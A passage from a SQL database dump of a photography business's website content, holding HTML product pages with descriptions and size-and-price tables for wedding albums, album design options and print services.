</tr>\r\n <tr>\r\n <td valign=\"top\">25x25cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n </font><font color=\"#000000\">£ 315 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n </font><font color=\"#000000\">£ 260 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x18cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n </font><font color=\"#000000\">£ 260 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n </font><font color=\"#000000\">N/A</font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n </p>','','','Y','2010-05-31 09:45:18','2010-05-20 09:52:17',74),(75,'Layout2','10','Nice','wed-albums-nice.php','Nice','Nice','Nice','','PROD_75.jpg','','<span class=\'pinksmalltitle\'> Nice</span>','<p><br />\r\nElegant and sophisticated, the Nice incorporates an image inserted into the front cover, to create a simple yet striking modern design.The insert is available in acrylic, etched aluminium or sealed print.The Nice insert is 19.6x7.7cm <br />\r\nand always inserted at the top centre of the cover as illustrated.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p> </p>\r\n<p>All prices are +vat<br />\r\n<br />\r\n<table style=\"width: 184px; height: 271px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"184\" height=\"271\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\">\r\n <p><strong><font color=\"#ec008c\">Size</font></strong></p>\r\n </td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Leatherette <br />\r\n <font color=\"#000000\">Leather</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 40x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\"><br />\r\n £ 440 +vat<br />\r\n </font><font color=\"#000000\">£ 480 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x35cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 440 +vat<br />\r\n <font color=\"#000000\">£ 480 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x28cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390 +vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390 +vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x24cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">25x25cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x18cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n </p>','','','Y','2010-06-10 09:32:47','2010-05-20 09:53:26',75),(76,'Layout2','10','Marseille','wed-albums-marseille.php','Marseille','Marseille','Marseille','','PROD_76.jpg','','<span class=\'pinksmalltitle\'> Marseille</span>','<p><br />\r\nSimilar to the Nice in presentation, the Marseille utilises the same technique of incorporating the cover image to create an elegant and sophisticated style. The insert is available in acrylic, etched aluminium or sealed print.<br />\r\n<br />\r\nThe Marseille insert is 14x10.5cm and always inserted on right centre as illustrated.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><br />\r\nAll prices are +vat<br />\r\n<br />\r\n<table style=\"width: 184px; height: 271px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"184\" height=\"271\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\">\r\n <p><strong><font color=\"#ec008c\">Size</font></strong></p>\r\n </td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Leatherette <br />\r\n <font color=\"#000000\">Leather</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 40x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\"><br />\r\n £ 440 +vat<br />\r\n </font><font color=\"#000000\">£ 480 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x35cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 440 +vat<br />\r\n <font color=\"#000000\">£ 480 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x28cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390 +vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390 +vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x24cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290 +vat<br />\r\n <font color=\"#000000\">£ 315 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">25x25cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290 +vat<br />\r\n <font color=\"#000000\">£ 315 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 240 +vat<br />\r\n <font color=\"#000000\">£ 260 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x18cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n </p>','','','Y','2010-06-10 09:34:24','2010-05-20 09:54:25',76),(77,'Layout2','10','Brooklyn','wed-albums-brooklyn.php','Brooklyn','Brooklyn','Brooklyn','','PROD_77.jpg','','<span class=\'pinksmalltitle\'> Brooklyn</span>','<p><br />\r\nThe Brooklyn incorporates an image inserted into the front cover to create a simple yet striking modern design. The shape and style of the image insert adds a modern and sophisticated twist to this classically styled album. The insert on the Brooklyn is available in acrylic, etched aluminium or sealed print and is 20cm high x 10cm wide</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p>All prices are +vat<br />\r\n<br />\r\n<table style=\"width: 184px; height: 271px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"184\" height=\"271\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\">\r\n <p><strong><font color=\"#ec008c\">Size</font></strong></p>\r\n </td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Leatherette <br />\r\n <font color=\"#000000\">Leather</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 40x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\"><br />\r\n £ 440 +vat<br />\r\n </font><font color=\"#000000\">£ 480 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x35cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 440 +vat<br />\r\n <font color=\"#000000\">£ 480 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x28cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390+vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390+vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x24cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">25x25cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x18cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n </font><font color=\"#000000\">N/A</font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n </p>','','','Y','2010-05-31 09:47:31','2010-05-20 09:55:26',77),(78,'Layout2','10','Manhattan','wed-albums-manhattan.php','Manhattan','Manhattan','Manhattan','','PROD_78.jpg','','<span class=\'pinksmalltitle\'> Manhattan</span>','<p><br />\r\nA dramatic new design, enhancing pre-formed conventions of image presentation. This exclusive option is both bold and stylish though not too far removed from its classical origins.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p>All prices are +vat<br />\r\n<br />\r\n<table style=\"width: 184px; height: 127px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"184\" height=\"127\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\">\r\n <p><strong><font color=\"#ec008c\">Size</font></strong></p>\r\n </td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Leatherette <br />\r\n <font color=\"#000000\">Leather</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 50x25cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\"><br />\r\n £ 425 +vat<br />\r\n </font><font color=\"#000000\">N/A</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">25x12.5cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 175 +vat<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n</p>','','','Y','2010-05-31 09:47:56','2010-05-20 09:56:54',78),(79,'Layout2','10','Sofia 5x5','wed-albums-sophia5x5.php','Sofia 5x5','Sofia 5x5','Sofia 5x5','','PROD_79.jpg','','<span class=\'pinksmalltitle\'> Sophia 5x5</span>','<p><br />\r\nBuilding on the simplicity of our classic Riyadh albums, the Sofia range incorporates the same fine materials and workmanship whilst introducing a totally new dimension to the cover. A 5x5cm image is carefully recessed into the cover creating yet another stylish and contemporary album.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p>All prices are +vat<br />\r\n<br />\r\n<table style=\"width: 184px; height: 271px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"184\" height=\"271\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\">\r\n <p><strong><font color=\"#ec008c\">Size</font></strong></p>\r\n </td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Leatherette <br />\r\n <font color=\"#000000\">Leather</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 40x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\"><br />\r\n £ 440 +vat<br />\r\n </font><font color=\"#000000\">£ 480 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x35cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 440 +vat<br />\r\n <font color=\"#000000\">£ 480 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x28cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390+vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390+vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x24cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290 +vat<br />\r\n <font color=\"#000000\">£ 315 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">25x25cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290 +vat<br />\r\n <font color=\"#000000\">£ 315 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 240 +vat<br />\r\n <font color=\"#000000\">£ 260 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x18cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 240 +vat<br />\r\n <font color=\"#000000\">£ 260 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 140 +vat<br />\r\n <font color=\"#000000\">£ 150 +vat</font></font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n </p>','','','Y','2010-05-31 09:49:38','2010-05-20 09:59:14',79),(80,'Layout2','10','Sophia 13x5','wed-albums-sophia13x5.php','Sophia 13x5','Sophia 13x5','Sophia 13x5','','PROD_80.jpg','','<span class=\'pinksmalltitle\'> Sophia 13x5</span>','<p><br />\r\nBuilding upon the simplicity of our classic Riyadh albums, the Sofia range incorporates the same fine materials and workmanship, whilst introducing a totally new dimension to the cover. A 13x5 cm image is carefully recessed into the cover creating yet another stylish and contemporary album. The image recess can be presented upright, as shown, or view.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p> </p>\r\n<p>All prices are +vat<br />\r\n<br />\r\n<table style=\"width: 184px; height: 271px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"184\" height=\"271\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\">\r\n <p><strong><font color=\"#ec008c\">Size</font></strong></p>\r\n </td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Leatherette <br />\r\n <font color=\"#000000\">Leather</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 40x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\"><br />\r\n £ 440 +vat<br />\r\n </font><font color=\"#000000\">£ 480 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x35cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 440 +vat<br />\r\n <font color=\"#000000\">£ 480 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x28cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390+vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390+vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x24cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290 +vat<br />\r\n <font color=\"#000000\">£ 315 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">25x25cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290 +vat<br />\r\n <font color=\"#000000\">£ 315 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 240 +vat<br />\r\n <font color=\"#000000\">£ 260 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x18cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 240 +vat<br />\r\n <font color=\"#000000\">£ 260 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n </p>','','','Y','2010-05-31 09:50:53','2010-05-20 10:00:30',80),(81,'Layout2','10','Sophia 12x12','wed-albums-sophia12x12.php','Sophia 12x12','Sophia 12x12','Sophia 12x12','','PROD_81.jpg','','<span class=\'pinksmalltitle\'> Sophia 12x12</span>','<p><br />\r\nBuilding upon the simplicity of our classic Riyadh albums, the Sofia range incorporates the same fine materials and workmanship, whilst introducing a totally new dimension to the cover. A 12x12cm image will be carefully recessed into the cover creating another stylish and contemporary album.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p> </p>\r\n<p>All prices are +vat<br />\r\n<br />\r\n<table style=\"width: 184px; height: 271px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"184\" height=\"271\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\">\r\n <p><strong><font color=\"#ec008c\">Size</font></strong></p>\r\n </td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Leatherette <br />\r\n <font color=\"#000000\">Leather</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 40x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\"><br />\r\n £ 440 +vat<br />\r\n </font><font color=\"#000000\">£ 480 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x35cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 440 +vat<br />\r\n <font color=\"#000000\">£ 480 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x28cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390+vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390+vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x24cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290 +vat<br />\r\n <font color=\"#000000\">£ 315 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">25x25cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 290 +vat<br />\r\n <font color=\"#000000\">£ 315 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 240 +vat<br />\r\n <font color=\"#000000\">£ 260 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x18cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 240 +vat<br />\r\n <font color=\"#000000\">£ 260 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n </p>','','','Y','2010-05-31 09:51:47','2010-05-20 10:01:35',81),(82,'Layout2','10','Sophia 25x9','wed-albums-sophia25x9.php','Sophia 25x9','Sophia 25x9','Sophia 25x9','','PROD_82.jpg','','<span class=\'pinksmalltitle\'> Sophia 25x9</span>','<p><br />\r\nBuilding upon the simplicity of our classic Riyadh albums, the Sofia range incorporates the same fine materials and workmanship, whilst introducing a totally new dimension to the cover. A 25x9cm image is carefully recessed into the cover to create a stylish and contemporary album. The image recess can be presented upright, as shown, or view.</p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p> </p>\r\n<p>All prices are +vat<br />\r\n<br />\r\n<table style=\"width: 184px; height: 271px\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"184\" height=\"271\">\r\n <tbody>\r\n <tr>\r\n <td style=\"width: 100px\" valign=\"top\">\r\n <p><strong><font color=\"#ec008c\">Size</font></strong></p>\r\n </td>\r\n <td valign=\"top\"><font color=\"#ec008c\"><strong>Leatherette <br />\r\n <font color=\"#000000\">Leather</font></strong></font></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\"><br />\r\n 40x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\"><br />\r\n £ 440 +vat<br />\r\n </font><font color=\"#000000\">£ 480 +vat</font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x35cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 440 +vat<br />\r\n <font color=\"#000000\">£ 480 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">35x28cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390+vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x30cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">£ 390+vat<br />\r\n <font color=\"#000000\">£ 425 +vat</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">30x24cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">25x25cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">20x20cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">24x18cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n <tr>\r\n <td valign=\"top\">16x12cm</td>\r\n <td valign=\"top\"><strong><font color=\"#ec008c\">N/A<br />\r\n <font color=\"#000000\">N/A</font></font></strong></td>\r\n </tr>\r\n </tbody>\r\n</table>\r\n </p>','','','Y','2010-05-31 09:52:36','2010-05-20 10:03:13',82),(83,'Layout2','10','The Slip In','wed-albums-slipin.php','The Slip In','The Slip In','The Slip In','','PROD_83.jpg','','The <span class=\'pinksmalltitle\'> Slip In</span>','<p><br />\r\n<span class=\"SlipInBody\">Utilising a more traditional page presentation but still retaining the high quality handmade craftsmanship the Slip In Albums will be supplied fully finished (which includes printing but not the design of the album).<br />\r\n<br />\r\n</span><font size=\"4\"><span class=\"slipInHead\"><strong><font size=\"2\">The Slip In is available in two distinct options, the Contemporary and the Classical.</font></strong></span><br />\r\n</font><span class=\"SlipInBody\"><br />\r\nEach album has a set size of 38x32 cm and also a set image size of 29x23cm (which will always be upright). The fixed amount of pages per album is 40.</span></p>','Size\'s & <span class=\'pinksmalltitle\'> Prices</span>','<p><br />\r\n<font size=\"2\">The Contemporary,<br />\r\nPicture Fronted: - <br />\r\n<br />\r\n<font color=\"#ec008c\"><strong>Price £ 179+vat<br />\r\n<br />\r\n</strong><font color=\"#000000\">The Classical,<br />\r\nMaterial Fronted: - <br />\r\n<br />\r\n</font><font color=\"#ec008c\"><strong>Price £ 139+vat<br />\r\n<br />\r\n</strong><font size=\"1\">Each comes supplied with own leather effect carry bag.</font></font></font></font></p>','','','Y','2010-06-08 15:39:16','2010-05-20 10:04:08',83),(84,'Layout1','10','Design','wed-albums-design.php','Design','Design','Design','<br />\r\n<p align=\"left\"><img alt=\"\" width=\"722\" height=\"105\" src=\"http://www.paulgrahamltd.com/EditorImages/image/Header_Design-PG.jpg\" /></p>\r\n<table border=\"0\" width=\"100%\" height=\"50\">\r\n <tbody>\r\n <tr>\r\n <td width=\"50%\">\r\n <p><strong>At Paul Grahams we offer a bespoke album <br />\r\n design service which will suit any of our customers\'<br />\r\n needs, from the <font color=\"#ec008c\" face=\"Verdana\">lavish and luxurious </font> to the </strong><strong><font color=\"#ec008c\" face=\"Verdana\">simple <br />\r\n and elegant</font> . These can be used for any special<br />\r\n occasion such as a wedding, birthday, christening,<br />\r\n anniversary or as a keepsake momento.</strong></p>\r\n <p><strong>Focused on providing an individualised service to <br />\r\n each and every client our highly dedicated <font color=\"#ec008c\" face=\"Verdana\">\'in-house\'</font> <br />\r\n design team will create each album as individual as<br />\r\n your own special day and oversee the entire design process </strong><strong><font color=\"#ec008c\" face=\"Verdana\">from initial construction, through to <br />\r\n the final product.<br />\r\n </font><br />\r\n Our design servive is broken down into three distinct options.</strong><br />\r\n <br />\r\n <strong>Option <font color=\"#ec008c\" face=\"Verdana\">1</font>:</strong><br />\r\n <br />\r\n Modern design based upon simplicity and elegance. Black and white backgrounds and clean, sleek lines <br />\r\n are the height of minimalist presentation. With no further design adjustments, the images are in all cases <br />\r\n used as supplied.<br />\r\n <br />\r\n <strong><font face=\"Verdana\"><font color=\"#ec008c\">* Simple and elegant</font><br />\r\n </font><font color=\"#ec008c\" face=\"Verdana\">* </font><font color=\"#ec008c\" face=\"Verdana\">No effects, all straight edged images.</font><br />\r\n <font color=\"#ec008c\" face=\"Verdana\">* No ghost backgrounds.</font><br />\r\n <font color=\"#ec008c\" face=\"Verdana\">* White and black pages or a combination<br />\r\n of the two but no coloured backgrounds.</font><br />\r\n <font color=\"#ec008c\" face=\"Verdana\">* White and black pinlines.</font></strong></p>\r\n </td>\r\n <td valign=\"top\">\r\n <p><strong>Option <font color=\"#ec008c\" face=\"Verdana\">2</font>:</strong><br />\r\n <br />\r\n Style follows design with colour coordinated backgrounds and key lines. With this design, soft backgrounds and filters are used giving your work that extra level of creativity. Featuring colour graduations and offset placements to enhance your final design.</p>\r\n <p><strong><font color=\"#ec008c\" face=\"Verdana\">* Ghost and graduated backgrounds.<br />\r\n </font><font color=\"#ec008c\" face=\"Verdana\">* Colour matched backgrounds.</font><br />\r\n <font color=\"#ec008c\" face=\"Verdana\">* Colour co-ordinated pin lines.</font><br />\r\n </strong><font color=\"#ec008c\" face=\"Verdana\"><strong>* Tinted/toned images<br />\r\n * No plain white pages</strong>.<br />\r\n <br />\r\n <br />\r\n </font><strong>Option <font color=\"#ec008c\" face=\"Verdana\">3</font> :<br />\r\n <br />\r\n </strong>A sumptuous combination of structure and design complements throughout. Featuring a diverse balance of linear borders and flowing imagery all of which combine to create a contemporary and innovative design concept.</p>\r\n <p><font color=\"#ec008c\" face=\"Verdana\"><strong>* A combination of option 1 and option 2 styles bring together a modern and elegant layout style with colour co-ordination and detailed backgrounds.</strong></font></p>\r\n </td>\r\n </tr>\r\n </tbody>\r\n</table>','','','','','','','','','Y','2010-06-10 09:43:13','2010-05-20 12:14:14',122),(85,'Layout1','10','Technical','wed-albums-technical.php','Technical','Technical','Technical','<p><br />\r\n<img height=\"530\" width=\"750\" alt=\"\" src=\"http://109.75.160.9/~paulgrah/EditorImages/image/Albums_Technical_PG-Site.jpg\" /></p>','','','','','','','','','Y','2010-06-09 11:42:11','2010-05-20 12:16:33',123),(86,'Layout1','6','Budget Prints','budget-prints.php','Budget Prints','Budget Prints','Budget Prints','<p><br />\r\n Printed directly onto either lustre or glossy photographic paper, <br />\r\n our Budget service is designed to give a cost effective option for <br />\r\n customers.</p>\r\n<p> This service does not include any density or colour correction. <br />\r\n Customers requiring such a service should refer to one of our <br />\r\n premium options.<br />\r\n<br />\r\n All Prices are Subject to vat.<br />\r\n<br />\r\n<img height=\"900\" width=\"544\" alt=\"\" src=\"http://www.paulgrahamltd.com//EditorImages/image/BUDGET_PRICES.jpg\" /></p>','','','','','','','','','Y','2012-01-19 13:44:43','2010-05-25 12:01:45',86),(87,'Layout1','6','Premium Corrected','premium.php','Premium Corrected','Premium Corrected','Premium Corrected','<br />\r\n A far more individual and bespoke printing service than the budget <br />\r\n option, the Premium service prints can be printed onto Lustre, Glossy <br />\r\n or Metallic paper. All images submitted for print will be individually <br />\r\n colour and density corrected. In cases where specific colour matching <br />\r\n is required, a sample print must be supplied.<br />\r\n<br />\r\n Images presented on Metallic paper will be charged an extra 15%<br />\r\n on top of the listed price.<br 